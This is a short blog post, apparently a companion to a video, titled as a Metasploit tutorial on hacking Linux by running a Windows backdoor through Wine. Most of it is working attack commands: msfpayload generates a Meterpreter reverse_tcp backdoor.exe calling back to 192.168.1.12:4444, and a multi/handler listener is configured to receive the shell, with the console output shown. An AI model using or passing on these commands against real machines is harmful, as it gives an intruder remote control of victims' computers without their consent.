How to Hack Linux -Metasploit Tutorial Backtrack 5 R1

Metasploit is a wonderful tool for penetration testing that contain a database of publicly known exploits for various operating system and software's, we have discussed how to hack windows via metasploit on backtrack Linux but how to hack Linux (Ubuntu and any other Linux) via metasploit. Metasploit contain several exploits for Linux operating system too but we can windows exploit for Linux. This is the video tutorial in which I will show you how to hack a Linux operating system because in the penetration testing sometimes we need to get the root access on the server or computer.

This video let you know about the weaknesses of wine (an application to run windows executable on Linux), yes an attacker take advantage of wine to execute their windows backdoor on Linux machine to get the full access on the computer.


root@bt:~# msfpayload windows/meterpreter/reverse_tcp lhost=192.168.1.12 lport=4444 X > backdoor.exe

Created by msfpayload (http://www.metasploit.com).
Payload: windows/meterpreter/reverse_tcp
 Length: 290
Options: {"lhost"=>"192.168.1.12", "lport"=>"4444"}

Metasploit commands
msf > use multi/handler
msf  exploit(handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf  exploit(handler) > set lhost 192.168.1.12
lhost => 192.168.1.12
msf  exploit(handler) > set lport 4444
lport => 4444
msf  exploit(handler) > exploit

[*] Started reverse handler on 192.168.1.12:4444
[*] Starting the payload handler...




Note: If you want to learn more about Linux and Windows based Penetration testing, you might want to subscribe our RSS feed and Email Subscription  or become our Facebook fan! You will get all the latest updates at both the places.